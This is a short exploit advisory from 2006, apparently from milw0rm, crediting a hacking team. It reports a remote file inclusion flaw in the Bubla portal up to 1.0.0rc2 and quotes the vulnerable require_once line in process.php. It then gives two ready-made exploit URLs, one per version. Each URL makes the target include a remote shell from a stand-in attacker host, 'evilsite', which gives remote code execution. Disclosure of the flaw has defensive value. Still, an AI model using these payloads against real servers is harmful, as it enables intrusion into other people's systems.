**********************************************************************************************************
DeltasecurityTEAM
WwW.Deltasecurity.iR
**********************************************************************************************************
* Portal Name = Bubla <= 1.0.0rc2
* Class = Remote File Inclusion
* Risk = High (Remote File Execution)
* Download = http://download.sourceforge.net/pub/sourceforge/b/bu/bubla/bubla-1.0.0rc1.tar.gz
* Discoverd By = DeltahackingTEAM
* User In Delta Team = Davood_Cracker
* Conatact = Davood_cracker@yahoo.com
* 128 Bit Security Server= www.takserver.ir
* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------
Vulnerable code in process.php
require_once($bu_dir."/bu_l2.php");
--------------------------------------------------------------------------------------------
- Exploit:
1.0.0 RC1 http://localhost/[PATH]/bu/process.php?bu_dir=http://evilsite/Shell.php?
1.0.0 RC2 http://localhost/[PATH]/bu/process.php?bu_config[dir]=http://evilsite/Shell.php?
--------------------------------------------------------------------------------------------
Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc
SP TNX : Dr.Pantagon
**********************************************************************************************************
# milw0rm.com [2006-12-27]